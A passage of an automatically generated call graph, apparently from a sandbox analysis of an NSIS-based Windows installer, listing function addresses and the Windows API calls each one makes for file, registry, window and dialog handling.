3459->3465 3466 4067cd GetWindowsDirectoryW 3459->3466 3467 406844 lstrcatW 3459->3467 3468 4066a5 10 API calls 3459->3468 3469 4068ef 5 API calls 3459->3469 3470 4067fc SHGetSpecialFolderLocation 3459->3470 3634 4065af wsprintfW 3459->3634 3635 406668 lstrcpynW 3459->3635 3460->3459 3461->3459 3464->3459 3465->3460 3466->3459 3467->3459 3468->3459 3469->3459 3470->3459 3471 406814 SHGetPathFromIDListW CoTaskMemFree 3470->3471 3471->3459 3473 406449 3472->3473 3474 40643c 3472->3474 3473->3310 3637 4062ae 3474->3637 3477 405c8a 3476->3477 3478 405c7e CloseHandle 3476->3478 3477->3310 3478->3477 3482 405cdd 3479->3482 3480 403b89 ExitProcess 3481 405cf1 MessageBoxIndirectW 3481->3480 3482->3480 3482->3481 3484 401389 2 API calls 3483->3484 3485 401420 3484->3485 3485->3266 3487 4068fc 3486->3487 3489 406972 3487->3489 3490 406965 CharNextW 3487->3490 3492 405f64 CharNextW 3487->3492 3493 406951 CharNextW 3487->3493 3494 406960 CharNextW 3487->3494 3488 406977 CharPrevW 3488->3489 3489->3488 3491 406998 3489->3491 3490->3487 3490->3489 3491->3332 3492->3487 3493->3487 3494->3490 3496 405f53 lstrcatW 3495->3496 3497 40362d 3495->3497 3496->3497 3497->3335 3499 406194 GetTickCount GetTempFileNameW 3498->3499 3500 40363e 3499->3500 3501 4061ca 3499->3501 3500->3248 3501->3499 3501->3500 3502->3341 3503->3343 3505 405f91 3504->3505 3506 40313c 3505->3506 3507 405f97 CharPrevW 3505->3507 3508 406668 lstrcpynW 3506->3508 3507->3505 3507->3506 3508->3347 3510 403057 3509->3510 3511 40303f 3509->3511 3513 403067 GetTickCount 3510->3513 3514 40305f 3510->3514 3512 403048 DestroyWindow 3511->3512 3517 40304f 3511->3517 3512->3517 3516 403075 3513->3516 3513->3517 3544 406a71 3514->3544 3518 4030aa CreateDialogParamW ShowWindow 3516->3518 3519 40307d 3516->3519 3517->3352 3517->3368 3543 4035f8 SetFilePointer 3517->3543 3518->3517 3519->3517 3548 403012 3519->3548 3521 40308b wsprintfW 3551 4056ca 3521->3551 3524->3365 3526 403380 SetFilePointer 3525->3526 3527 40339c 3525->3527 3526->3527 3562 403479 GetTickCount 3527->3562 3532 403479 42 API calls 3533 4033d3 3532->3533 3534 40343f ReadFile 3533->3534 3538 4033e2 3533->3538 3539 403439 3533->3539 3534->3539 3536 4061db ReadFile 3536->3538 3538->3536 3538->3539 3577 40620a WriteFile 3538->3577 3539->3368 3541 4061db ReadFile 3540->3541 3542 4035f5 3541->3542 3542->3367 3543->3357 3545 406a8e PeekMessageW 3544->3545 3546 406a84 DispatchMessageW 3545->3546 3547 406a9e 3545->3547 3546->3545 3547->3517 3549 403021 3548->3549 3550 403023 MulDiv 3548->3550 3549->3550 3550->3521 3552 4056e5 3551->3552 3553 4030a8 3551->3553 3554 405701 lstrlenW 3552->3554 3555 4066a5 17 API calls 3552->3555 3553->3517 3556 40572a 3554->3556 3557 40570f lstrlenW 3554->3557 3555->3554 3558 405730 SetWindowTextW 3556->3558 3559 40573d 3556->3559 3557->3553 3560 405721 lstrcatW 3557->3560 3558->3559 3559->3553 3561 405743 SendMessageW SendMessageW SendMessageW 3559->3561 3560->3556 3561->3553 3563 4035d1 3562->3563 3564 4034a7 3562->3564 3565 40302e 32 API calls 3563->3565 3579 4035f8 SetFilePointer 3564->3579 3572 4033a3 3565->3572 3567 4034b2 SetFilePointer 3571 4034d7 3567->3571 3568 4035e2 ReadFile 3568->3571 3570 40302e 32 API calls 3570->3571 3571->3568 3571->3570 3571->3572 3573 40620a WriteFile 3571->3573 3574 4035b2 SetFilePointer 3571->3574 3580 406bb0 3571->3580 3572->3539 3575 4061db ReadFile 3572->3575 3573->3571 3574->3563 3576 4033bc 3575->3576 3576->3532 3576->3539 3578 406228 3577->3578 3578->3538 3579->3567 3581 406bd5 3580->3581 3582 406bdd 3580->3582 3581->3571 3582->3581 3583 406c64 GlobalFree 3582->3583 3584 406c6d GlobalAlloc 3582->3584 3585 406ce4 GlobalAlloc 3582->3585 3586 406cdb GlobalFree 3582->3586 3583->3584 3584->3581 3584->3582 3585->3581 3585->3582 3586->3585 3588 404001 3587->3588 3609 4065af wsprintfW 3588->3609 3590 404072 3610 4040a6 3590->3610 3592 403da2 3592->3382 3593 404077 3593->3592 3594 4066a5 17 API calls 3593->3594 3594->3593 3595->3378 3613 4064d5 3596->3613 3599 403d73 3599->3377 3599->3379 3600 40656a RegQueryValueExW RegCloseKey 3600->3599 3601->3384 3617 404610 3602->3617 3604 4057e7 3605 404610 SendMessageW 3604->3605 3607 4057f9 OleUninitialize 3605->3607 3606 4057c0 3606->3604 3620 401389 3606->3620 3607->3414 3609->3590 3611 4066a5 17 API calls 3610->3611 3612 4040b4 SetWindowTextW 3611->3612 3612->3593 3614 4064e4 3613->3614 3615 4064e8 3614->3615 3616 4064ed RegOpenKeyExW 3614->3616 3615->3599 3615->3600 3616->3615 3618 404628 3617->3618 3619 404619 SendMessageW 3617->3619 3618->3606 3619->3618 3622 401390 3620->3622 3621 4013fe 3621->3606 3622->3621 3623 4013cb MulDiv SendMessageW 3622->3623 3623->3622 3624->3428 3626 405fff 3625->3626 3628 406011 3625->3628 3627 40600c CharNextW 3626->3627 3626->3628 3630 406035 3627->3630 3629 405f64 CharNextW 3628->3629 3628->3630 3629->3628 3630->3431 3630->3432 3632 4069b4 FindClose 3631->3632 3633 4069bf 3631->3633 3632->3633 3633->3438 3634->3459 3635->3459 3636->3457 3638 406304 GetShortPathNameW 3637->3638 3639 4062de 3637->3639 3640 406423 3638->3640 3641 406319 3638->3641 3664 406158 GetFileAttributesW CreateFileW 3639->3664 3640->3473 3641->3640 3643 406321 wsprintfA 3641->3643 3645 4066a5 17 API calls 3643->3645 3644 4062e8 CloseHandle GetShortPathNameW 3644->3640 3646 4062fc 3644->3646 3647 406349 3645->3647 3646->3638 3646->3640 3665 406158 GetFileAttributesW CreateFileW 3647->3665 3649 406356 3649->3640 3650 406365 GetFileSize GlobalAlloc 3649->3650 3651 406387 3650->3651 3652 40641c CloseHandle 3650->3652 3653 4061db ReadFile 3651->3653 3652->3640 3654 40638f 3653->3654 3654->3652 3666 4060bd lstrlenA 3654->3666 3657 4063a6 lstrcpyA 3660 4063c8 3657->3660 3658 4063ba 3659 4060bd 4 API calls 3658->3659 3659->3660 3661 4063ff SetFilePointer 3660->3661 3662 40620a WriteFile 3661->3662 3663 406415 GlobalFree 3662->3663 3663->3652 3664->3644 3665->3649 3667 4060fe lstrlenA 3666->3667 3668 406106 3667->3668 3669 4060d7 lstrcmpiA 3667->3669 3668->3657 3668->3658 3669->3668 3670 4060f5 CharNextA 3669->3670 3670->3667 3671 401941 3672 401943 3671->3672 3677 402da6 3672->3677 3678 402db2 3677->3678 3679 4066a5 17 API calls 3678->3679 3680 402dd3 3679->3680 3681 401948 3680->3681 3682 4068ef 5 API calls 3680->3682 3683 405d74 3681->3683 3682->3681 3684 40603f 18 API calls 3683->3684 3685 405d94 3684->3685 3686 405d9c DeleteFileW 3685->3686 3687 405db3 3685->3687 3691 401951 3686->3691 3688 405ed3 3687->3688 3719 406668 lstrcpynW 3687->3719 3688->3691 3695 40699e 2 API calls 3688->3695 3690 405dd9 3692 405dec 3690->3692 3693 405ddf lstrcatW 3690->3693 3694 405f83 2 API calls 3692->3694 3696 405df2 3693->3696 3694->3696 3698 405ef8 3695->3698 3697 405e02 lstrcatW 3696->3697 3699 405e0d lstrlenW FindFirstFileW 3696->3699 3697->3699 3698->3691 3700 405f37 3 API calls 3698->3700 3699->3688 3717 405e2f 3699->3717 3701 405f02 3700->3701 3703 405d2c 5 API calls 3701->3703 3702 405eb6 FindNextFileW 3706 405ecc FindClose 3702->3706 3702->3717 3705 405f0e 3703->3705 3707 405f12 3705->3707 3708 405f28 3705->3708 3706->3688 3707->3691 3711 4056ca 24 API calls 3707->3711 3710 4056ca 24 API calls 3708->3710 3710->3691 3713 405f1f 3711->3713 3712 405d74 60 API calls 3712->3717 3715 406428 36 API calls 3713->3715 3714 4056ca 24 API calls 3714->3702 3715->3691 3716 4056ca 24 API calls 3716->3717 3717->3702 3717->3712 3717->3714 3717->3716 3718 406428 36 API calls 3717->3718 3720 406668 lstrcpynW 3717->3720 3721 405d2c 3717->3721 3718->3717 3719->3690 3720->3717 3729 406133 GetFileAttributesW 3721->3729 3724 405d47 RemoveDirectoryW 3727 405d55 3724->3727 3725 405d4f DeleteFileW 3725->3727 3726 405d59 3726->3717 3727->3726 3728 405d65 SetFileAttributesW 3727->3728 3728->3726 3730 405d38 3729->3730 3731 406145 SetFileAttributesW 3729->3731 3730->3724 3730->3725 3730->3726 3731->3730 3732 4015c1 3733 402da6 17 API calls 3732->3733 3734 4015c8 3733->3734 3735 405fe2 4 API calls 3734->3735 3747 4015d1 3735->3747 3736 401631 3737 401663 3736->3737 3738 401636 3736->3738 3742 401423 24 API calls 3737->3742 3751 401423 3738->3751 3739 405f64 CharNextW 3739->3747 3748 40165b 3742->3748 3744 405c16 2 API calls 3744->3747 3745 405c33 5 API calls 3745->3747 3746 40164a SetCurrentDirectoryW 3746->3748 3747->3736 3747->3739 3747->3744 3747->3745 3749 401617 GetFileAttributesW 3747->3749 3750 405b99 4 API calls 3747->3750 3749->3747 3750->3747 3752 4056ca 24 API calls 3751->3752 3753 401431 3752->3753 3754 406668 lstrcpynW 3753->3754 3754->3746 3935 401c43 3957 402d84 3935->3957 3937 401c4a 3938 402d84 17 API calls 3937->3938 3939 401c57 3938->3939 3940 402da6 17 API calls 3939->3940 3941 401c6c 3939->3941 3940->3941 3942 401c7c 3941->3942 3943 402da6 17 API calls 3941->3943 3944 401cd3 3942->3944 3945 401c87 3942->3945 3943->3942 3947 402da6 17 API calls 3944->3947 3946 402d84 17 API calls 3945->3946 3949 401c8c 3946->3949 3948 401cd8 3947->3948 3950 402da6 17 API calls 3948->3950 3951 402d84 17 API calls 3949->3951 3952 401ce1 FindWindowExW 3950->3952 3953 401c98 3951->3953 3956 401d03 3952->3956 3954 401cc3 SendMessageW 3953->3954 3955 401ca5 SendMessageTimeoutW 3953->3955 3954->3956 3955->3956 3958 4066a5 17 API calls 3957->3958 3959 402d99 3958->3959 3959->3937 3967 4028c4 3968 4028ca 3967->3968 3969 4028d2 FindClose 3968->3969 3970 402c2a 3968->3970 3969->3970 3776 4040c5 3777 4040dd 3776->3777 3778 40423e 3776->3778 3777->3778 3779 4040e9 3777->3779 3780 40424f GetDlgItem GetDlgItem 3778->3780 3785 40428f 3778->3785 3782 4040f4 SetWindowPos 3779->3782 3783 404107 3779->3783 3852 4045c4 3780->3852 3781 4042e9 3786 404610 SendMessageW 3781->3786 3794 404239 3781->3794 3782->3783 3787 404110 ShowWindow 3783->3787 3788 404152 3783->3788 3785->3781 3793 401389 2 API calls 3785->3793 3817 4042fb 3786->3817 3795 404130 GetWindowLongW 3787->3795 3796 40422b 3787->3796 3790 404171 3788->3790 3791 40415a DestroyWindow 3788->3791 3789 404279 KiUserCallbackDispatcher 3792 40140b 2 API calls 3789->3792 3798 404176 SetWindowLongW 3790->3798 3799 404187 3790->3799 3797 40456e 3791->3797 3792->3785 3800 4042c1 3793->3800 3795->3796 3802 404149 ShowWindow 3795->3802 3858 40462b 3796->3858 3797->3794 3809 40457e ShowWindow 3797->3809 3798->3794 3799->3796 3803 404193 GetDlgItem 3799->3803 3800->3781 3804 4042c5 SendMessageW 3800->3804 3802->3788 3807 4041c1 3803->3807 3808 4041a4 SendMessageW IsWindowEnabled 3803->3808 3804->3794 3805 40140b 2 API calls 3805->3817 3806 40454f DestroyWindow EndDialog 3806->3797 3811 4041ce 3807->3811 3814 404215 SendMessageW 3807->3814 3815 4041e1 3807->3815 3823 4041c6 3807->3823 3808->3794 3808->3807 3809->3794 3810 4066a5 17 API calls 3810->3817 3811->3814 3811->3823 3813 4045c4 18 API calls 3813->3817 3814->3796 3818 4041e9 3815->3818 3819 4041fe 3815->3819 3816 4041fc 3816->3796 3817->3805 3817->3806 3817->3810 3817->3813 3824 4045c4 18 API calls 3817->3824 3821 40140b 2 API calls 3818->3821 3820 40140b 2 API calls 3819->3820 3822 404205 3820->3822 3821->3823 3822->3796 3822->3823 3855 40459d 3823->3855 3825 404376 GetDlgItem 3824->3825 3826 404393 ShowWindow EnableWindow 3825->3826 3827 40438b 3825->3827 3872 4045e6 EnableWindow 3826->3872 3827->3826 3829 4043bd EnableWindow 3834 4043d1 3829->3834 3830 4043d6 GetSystemMenu EnableMenuItem SendMessageW 3831 404406 SendMessageW 3830->3831 3830->3834 3831->3834 3833 4040a6 18 API calls 3833->3834 3834->3830 3834->3833 3873 4045f9 SendMessageW 3834->3873 3874 406668 lstrcpynW 3834->3874 3836 404435 lstrlenW 3837 4066a5 17 API calls 3836->3837 3838 40444b SetWindowTextW 3837->3838 3839 401389 2 API calls 3838->3839 3840 40445c 3839->3840 3840->3794 3840->3817 3841 40448f DestroyWindow 3840->3841 3843 40448a 3840->3843 3841->3797 3842 4044a9 CreateDialogParamW 3841->3842 3842->3797 3844 4044dc 3842->3844 3843->3794 3845 4045c4 18 API calls 3844->3845 3846 4044e7 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3845->3846 3847 401389 2 API calls 3846->3847 3848 40452d 3847->3848 3848->3794 3849 404535 ShowWindow 3848->3849 3850 404610 SendMessageW 3849->3850 3851 40454d 3850->3851 3851->3797 3853 4066a5 17 API calls 3852->3853 3854 4045cf SetDlgItemTextW 3853->3854 3854->3789 3856 4045a4 3855->3856 3857 4045aa SendMessageW 3855->3857 3856->3857 3857->3816 3859 4046ee 3858->3859 3860 404643 GetWindowLongW 3858->3860 3859->3794 3860->3859 3861 404658 3860->3861 3861->3859 3862 404685 GetSysColor 3861->3862 3863 404688 3861->3863 3862->3863 3864 404698 SetBkMode 3863->3864 3865 40468e SetTextColor 3863->3865 3866 4046b0 GetSysColor 3864->3866 3867 4046b6 3864->3867 3865->3864 3866->3867 3868 4046c7 3867->3868 3869 4046bd SetBkColor 3867->3869 3868->3859 3870 4046e1 CreateBrushIndirect 3868->3870 3871 4046da DeleteObject 3868->3871 3869->3868 3870->3859 3871->3870 3872->3829 3873->3834 3874->3836 3974 4016cc 3975 402da6 17 API calls 3974->3975 3976 4016d2 GetFullPathNameW 3975->3976 3977 4016ec 3976->3977 3983 40170e 3976->3983 3979 40699e 2 API calls 3977->3979 3977->3983 3978 401723 GetShortPathNameW 3980 402c2a 3978->3980 3981 4016fe 3979->3981 3981->3983 3984 406668 lstrcpynW 3981->3984 3983->3978 3983->3980 3984->3983 3985 401e4e GetDC 3986 402d84 17 API calls 3985->3986 3987 401e60 GetDeviceCaps MulDiv ReleaseDC 3986->3987 3988 402d84 17 API calls 3987->3988 3989 401e91 3988->3989 3990 4066a5 17 API calls 3989->3990 3991 401ece CreateFontIndirectW 3990->3991 3992 402638 3991->3992 3992->3992 3993 402950 3994 402da6 17 API calls 3993->3994 3996 40295c 3994->3996 3995 402972 3998 406133 2 API calls 3995->3998 3996->3995 3997 402da6 17 API calls 3996->3997 3997->3995 3999 402978 3998->3999 4021 406158 GetFileAttributesW CreateFileW 3999->4021 4001 402985 4002 402a3b 4001->4002 4003 4029a0 GlobalAlloc 4001->4003 4004 402a23 4001->4004 4005 402a42 DeleteFileW 4002->4005 4006 402a55 4002->4006 4003->4004 4007 4029b9 4003->4007 4008 403371 44 API calls 4004->4008 4005->4006 4022 4035f8 SetFilePointer 4007->4022 4010 402a30 CloseHandle 4008->4010 4010->4002 4011 4029bf 4012 4035e2 ReadFile 4011->4012 4013 4029c8 GlobalAlloc 4012->4013 4014 4029d8 4013->4014 4015 402a0c 4013->4015 4016 403371 44 API calls 4014->4016 4017 40620a WriteFile 4015->4017 4020 4029e5 4016->4020 4018 402a18 GlobalFree 4017->4018 4018->4004 4019 402a03 GlobalFree 4019->4015 4020->4019 4021->4001 4022->4011 4030 403cd5 4031 403ce0 4030->4031 4032 403ce4 4031->4032 4033 403ce7 GlobalAlloc 4031->4033 4033->4032 4034 401956 4035 402da6 17 API calls 4034->4035 4036 40195d lstrlenW 4035->4036 4037 402638 4036->4037 4038 4014d7 4039 402d84 17 API calls 4038->4039 4040 4014dd Sleep 4039->4040 4042 402c2a 4040->4042 4043 4020d8 4044 4020ea 4043->4044 4054 40219c 4043->4054 4045 402da6 17 API calls 4044->4045 4046 4020f1 4045->4046 4048 402da6 17 API calls 4046->4048 4047 401423 24 API calls 4050 4022f6 4047->4050 4049 4020fa 4048->4049 4051 402110 LoadLibraryExW 4049->4051 4052 402102 GetModuleHandleW 4049->4052 4053 402121 4051->4053 4051->4054 4052->4051 4052->4053 4063 406aa4 4053->4063 4054->4047 4057 402132 4060 401423 24 API calls 4057->4060 4061 402142 4057->4061 4058 40216b 4059 4056ca 24 API calls 4058->4059 4059->4061 4060->4061 4061->4050 4062 40218e FreeLibrary 4061->4062 4062->4050 4068 40668a WideCharToMultiByte 4063->4068 4065 406ac1 4066 406ac8 GetProcAddress 4065->4066 4067 40212c 4065->4067 4066->4067 4067->4057 4067->4058 4068->4065 4069 402b59 4070 402b60 4069->4070 4071 402bab 4069->4071 4073 402ba9 4070->4073 4075 402d84 17 API calls 4070->4075 4072 406a35 5 API calls 4071->4072 4074 402bb2 4072->4074 4076 402da6 17 API calls 4074->4076 4077 402b6e 4075->4077 4078 402bbb 4076->4078 4079 402d84 17 API calls 4077->4079 4078->4073 4080 402bbf IIDFromString 4078->4080 4082 402b7a 4079->4082 4080->4073 4081 402bce 4080->4081 4081->4073 4087 406668 lstrcpynW 4081->4087 4086 4065af wsprintfW 4082->4086 4085 402beb CoTaskMemFree 4085->4073 4086->4073 4087->4085 4088 402a5b 4089 402d84 17 API calls 4088->4089 4090 402a61 4089->4090 4091 402aa4 4090->4091 4092 402a88 4090->4092 4097 40292e 4090->4097 4094 402abe 4091->4094 4095 402aae 4091->4095 4093 402a8d 4092->4093 4101 402a9e 4092->4101 4102 406668 lstrcpynW 4093->4102 4096 4066a5 17 API calls 4094->4096 4098 402d84 17 API calls 4095->4098 4096->4101 4098->4101 4101->4097 4103 4065af wsprintfW 4101->4103 4102->4097 4103->4097 3888 40175c 3889 402da6 17 API calls 3888->3889 3890 401763 3889->3890 3891 406187 2 API calls 3890->3891 3892 40176a 3891->3892 3893 406187 2 API calls 3892->3893 3893->3892 4104 401d5d 4105 402d84 17 API calls 4104->4105 4106 401d6e SetWindowLongW 4105->4106 4107 402c2a 4106->4107 4108 4028de 4109 4028e6 4108->4109 4110 4028ea FindNextFileW 4109->4110 4112 4028fc 4109->4112 4111 402943 4110->4111 4110->4112 4114 406668 lstrcpynW 4111->4114 4114->4112 4115 406d5f 4121 406be3 4115->4121 4116 40754e 4117 406c64 GlobalFree 4118 406c6d GlobalAlloc 4117->4118 4118->4116 4118->4121 4119 406ce4 GlobalAlloc 4119->4116 4119->4121 4120 406cdb GlobalFree 4120->4119 4121->4116 4121->4117 4121->4118 4121->4119 4121->4120 4122 401563 4123 402ba4 4122->4123 4126 4065af wsprintfW 4123->4126 4125 402ba9 4126->4125 4127 401968 4128 402d84 17 API calls 4127->4128 4129 40196f 4128->4129 4130 402d84 17 API calls 4129->4130 4131 40197c 4130->4131 4132 402da6 17 API calls 4131->4132 4133 401993 lstrlenW 4132->4133 4135 4019a4 4133->4135 4134 4019e5 4135->4134 4139 406668 lstrcpynW 4135->4139 4137 4019d5 4137->4134 4138 4019da lstrlenW 4137->4138 4138->4134 4139->4137 4147 40166a 4148 402da6 17 API calls 4147->4148 4149 401670 4148->4149 4150 40699e 2 API calls 4149->4150 4151 401676 4150->4151 4152 402aeb 4153 402d84 17 API calls 4152->4153 4154 402af1 4153->4154 4155 4066a5 17 API calls 4154->4155 4156 40292e 4154->4156 4155->4156 4157 4026ec 4158 402d84 17 API calls 4157->4158 4159 4026fb 4158->4159 4160 402745 ReadFile 4159->4160 4161 4061db ReadFile 4159->4161 4163 402785 MultiByteToWideChar 4159->4163 4164 40283a 4159->4164 4166 4027ab SetFilePointer MultiByteToWideChar 4159->4166 4167 40284b 4159->4167 4169 402838 4159->4169 4170 406239 SetFilePointer 4159->4170 4160->4159 4160->4169 4161->4159 4163->4159 4179 4065af wsprintfW 4164->4179 4166->4159 4168 40286c SetFilePointer 4167->4168 4167->4169 4168->4169 4171 406255 4170->4171 4174 40626d 4170->4174 4172 4061db ReadFile 4171->4172 4173 406261 4172->4173 4173->4174 4175 406276 SetFilePointer 4173->4175 4176 40629e SetFilePointer 4173->4176 4174->4159 4175->4176 4177 406281 4175->4177 4176->4174 4178 40620a WriteFile 4177->4178 4178->4174 4179->4169 4180 404a6e 4181 404aa4 4180->4181 4182 404a7e 4180->4182 4184 40462b 8 API calls 4181->4184 4183 4045c4 18 API calls 4182->4183 4185 404a8b SetDlgItemTextW 4183->4185 4186 404ab0 4184->4186 4185->4181 3894 40176f 3895 402da6 17 API calls 3894->3895 3896 401776 3895->3896 3897 401796 3896->3897 3898 40179e 3896->3898 3933 406668 lstrcpynW 3897->3933 3934 406668 lstrcpynW 3898->3934 3901 40179c 3905 4068ef 5 API calls 3901->3905 3902 4017a9 3903 405f37 3 API calls 3902->3903 3904 4017af lstrcatW 3903->3904 3904->3901 3925 4017bb 3905->3925 3906 40699e 2 API calls 3906->3925 3907 406133 2 API calls 3907->3925 3909 4017cd CompareFileTime 3909->3925 3910 40188d 3912 4056ca 24 API calls 3910->3912 3911 401864 3913 4056ca 24 API calls 3911->3913 3921 401879 3911->3921 3914 401897 3912->3914 3913->3921 3915 403371 44 API calls 3914->3915 3916 4018aa 3915->3916 3917 4018be SetFileTime 3916->3917 3918 4018d0 FindCloseChangeNotification 3916->3918 3917->3918 3920 4018e1 3918->3920 3918->3921 3919 4066a5 17 API calls 3919->3925 3923 4018e6 3920->3923 3924 4018f9 3920->3924 3922 406668 lstrcpynW 3922->3925 3926 4066a5 17 API calls 3923->3926 3927 4066a5 17 API calls 3924->3927 3925->3906 3925->3907 3925->3909 3925->3910 3925->3911 3925->3919 3925->3922 3928 405cc8 MessageBoxIndirectW 3925->3928 3932 406158 GetFileAttributesW CreateFileW 3925->3932 3929 4018ee lstrcatW 3926->3929 3930 401901 3927->3930 3928->3925 3929->3930 3931 405cc8 MessageBoxIndirectW 3930->3931 3931->3921 3932->3925 3933->3901 3934->3902 4187 401a72 4188 402d84 17 API calls 4187->4188 4189 401a7b 4188->4189 4190 402d84 17 API calls 4189->4190 4191 401a20 4190->4191 4192 401573 4193 401583 ShowWindow 4192->4193 4194 40158c 4192->4194 4193->4194 4195 402c2a 4194->4195 4196 40159a ShowWindow 4194->4196 4196->4195 4197 4023f4 4198 402da6 17 API calls 4197->4198 4199 402403 4198->4199 4200 402da6 17 API calls 4199->4200 4201 40240c 4200->4201 4202 402da6 17 API calls 4201->4202 4203 402416 GetPrivateProfileStringW 4202->4203 4204 4014f5 SetForegroundWindow 4205 402c2a 4204->4205 4206 401ff6 4207 402da6 17 API calls 4206->4207 4208 401ffd 4207->4208 4209 40699e 2 API calls 4208->4209 4210 402003 4209->4210 4212 402014 4210->4212 4213 4065af wsprintfW 4210->4213 4213->4212 4214 401b77 4215 402da6 17 API calls 4214->4215 4216 401b7e 4215->4216 4217 402d84 17 API calls 4216->4217 4218 401b87 wsprintfW 4217->4218 4219 402c2a 4218->4219 4220 4046fa lstrcpynW lstrlenW 4221 40167b 4222 402da6 17 API calls 4221->4222 4223 401682 4222->4223 4224 402da6 17 API calls 4223->4224 4225 40168b 4224->4225 4226 402da6 17 API calls 4225->4226 4227 401694 MoveFileW 4226->4227 4228 4016a0 4227->4228 4229 4016a7 4227->4229 4231 401423 24 API calls 4228->4231 4230 40699e 2 API calls 4229->4230 4233 4022f6 4229->4233 4232 4016b6 4230->4232 4231->4233 4232->4233 4234 406428 36 API calls 4232->4234 4234->4228 4242 4019ff 4243 402da6 17 API calls 4242->4243 4244 401a06 4243->4244 4245 402da6 17 API calls 4244->4245 4246 401a0f 4245->4246 4247 401a16 lstrcmpiW 4246->4247 4248 401a28 lstrcmpW 4246->4248 4249 401a1c 4247->4249 4248->4249 4250 4022ff 4251 402da6 17 API calls 4250->4251 4252 402305 4251->4252 4253 402da6 17 API calls 4252->4253 4254 40230e 4253->4254 4255 402da6 17 API calls 4254->4255 4256 402317 4255->4256 4257 40699e 2 API calls 4256->4257 4258 402320 4257->4258 4259 402331 lstrlenW lstrlenW 4258->4259 4260 402324 4258->4260 4262 4056ca 24 API calls 4259->4262 4261 4056ca 24 API calls 4260->4261 4264 40232c 4260->4264 4261->4264 4263 40236f SHFileOperationW 4262->4263 4263->4260 4263->4264 4265 401000 4266 401037 BeginPaint GetClientRect 4265->4266 4267 40100c DefWindowProcW 4265->4267 4269 4010f3 4266->4269 4270 401179 4267->4270 4271 401073 CreateBrushIndirect FillRect DeleteObject 4269->4271 4272 4010fc 4269->4272 4271->4269 4273 401102 CreateFontIndirectW 4272->4273 4274 401167 EndPaint 4272->4274 4273->4274 4275 401112 6 API calls 4273->4275 4274->4270 4275->4274 4276 401d81 4277 401d94 GetDlgItem 4276->4277 4278 401d87 4276->4278 4280 401d8e 4277->4280 4279 402d84 17 API calls 4278->4279 4279->4280 4281 401dd5 GetClientRect LoadImageW SendMessageW 4280->4281 4283 402da6 17 API calls 4280->4283 4284 401e33 4281->4284 4286 401e3f 4281->4286 4283->4281 4285 401e38 DeleteObject 4284->4285 4284->4286 4285->4286 4287 401503 4288 40150b 4287->4288 4290 40151e 4287->4290 4289 402d84 17 API calls 4288->4289 4289->4290 4291 404783 4292 40479b 4291->4292 4296 4048b5 4291->4296 4297 4045c4 18 API calls 4292->4297 4293 40491f 4294 4049e9 4293->4294 4295 404929 GetDlgItem 4293->4295 4302 40462b 8 API calls 4294->4302 4298 404943 4295->4298 4299 4049aa 4295->4299 4296->4293 4296->4294 4300 4048f0 GetDlgItem SendMessageW 4296->4300 4301 404802 4297->4301 4298->4299 4307 404969 SendMessageW LoadCursorW SetCursor 4298->4307 4299->4294 4303 4049bc 4299->4303 4324 4045e6 EnableWindow 4300->4324 4305 4045c4 18 API calls 4301->4305 4306 4049e4 4302->4306 4308 4049d2 4303->4308 4309 4049c2 SendMessageW 4303->4309 4311 40480f CheckDlgButton 4305->4311 4328 404a32 4307->4328 4308->4306 4314 4049d8 SendMessageW 4308->4314 4309->4308 4310 40491a 4325 404a0e 4310->4325 4322 4045e6 EnableWindow 4311->4322 4314->4306 4317 40482d GetDlgItem 4323 4045f9 SendMessageW 4317->4323 4319 404843 SendMessageW 4320 404860 GetSysColor 4319->4320 4321 404869 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4319->4321 4320->4321 4321->4306 4322->4317 4323->4319 4324->4310 4326 404a21 SendMessageW 4325->4326 4327 404a1c 4325->4327 4326->4293 4327->4326 4331 405c8e ShellExecuteExW 4328->4331 4330 404998 LoadCursorW SetCursor 4330->4299 4331->4330 4332 402383 4333 40238a 4332->4333 4336 40239d 4332->4336 4334 4066a5 17 API calls 4333->4334 4335 402397 4334->4335 4337 405cc8 MessageBoxIndirectW 4335->4337 4337->4336 4338 402c05 SendMessageW 4339 402c2a 4338->4339 4340 402c1f InvalidateRect 4338->4340 4340->4339 4341 405809 4342 4059b3 4341->4342 4343 40582a GetDlgItem GetDlgItem GetDlgItem 4341->4343 4345 4059e4 4342->4345 4346 4059bc GetDlgItem CreateThread CloseHandle 4342->4346 4386 4045f9 SendMessageW 4343->4386 4348 405a0f 4345->4348 4349 405a34 4345->4349 4350 4059fb ShowWindow ShowWindow 4345->4350 4346->4345 4347 40589a 4352 4058a1 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4347->4352 4351 405a6f 4348->4351 4354 405a23 4348->4354 4355 405a49 ShowWindow 4348->4355 4356 40462b 8 API calls 4349->4356 4388 4045f9 SendMessageW 4350->4388 4351->4349 4361 405a7d SendMessageW 4351->4361 4359 4058f3 SendMessageW SendMessageW 4352->4359 4360 40590f 4352->4360 4362 40459d SendMessageW 4354->4362 4357 405a69 4355->4357 4358 405a5b 4355->4358 4367 405a42 4356->4367 4364 40459d SendMessageW 4357->4364 4363 4056ca 24 API calls 4358->4363 4359->4360 4365 405922 4360->4365 4366 405914 SendMessageW 4360->4366 4361->4367 4368 405a96 CreatePopupMenu 4361->4368 4362->4349 4363->4357 4364->4351 4370 4045c4 18 API calls 4365->4370 4366->4365 4369 4066a5 17 API calls 4368->4369 4371 405aa6 AppendMenuW 4369->4371 4372 405932 4370->4372 4373 405ac3 GetWindowRect 4371->4373 4374 405ad6 TrackPopupMenu 4371->4374 4375 40593b ShowWindow 4372->4375 4376 40596f GetDlgItem SendMessageW 4372->4376 4373->4374 4374->4367 4378 405af1 4374->4378 4379 405951 ShowWindow 4375->4379 4380 40595e 4375->4380 4376->4367 4377 405996 SendMessageW SendMessageW 4376->4377 4377->4367 4381 405b0d SendMessageW 4378->4381 4379->4380 4387 4045f9 SendMessageW 4380->4387 4381->4381 4382 405b2a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4381->4382 4384 405b4f SendMessageW 4382->4384 4384->4384 4385 405b78 GlobalUnlock SetClipboardData CloseClipboard 4384->4385 4385->4367 4386->4347 4387->4376 4388->4348 4389 40248a 4390 402da6 17 API calls 4389->4390 4391 40249c 4390->4391 4392 402da6 17 API calls 4391->4392 4393 4024a6 4392->4393 4406 402e36 4393->4406 4396 40292e 4397 4024de 4399 4024ea 4397->4399 4402 402d84 17 API calls 4397->4402 4398 402da6 17 API calls 4401 4024d4 lstrlenW 4398->4401 4400 402509 RegSetValueExW 4399->4400 4403 403371 44 API calls 4399->4403 4404 40251f RegCloseKey 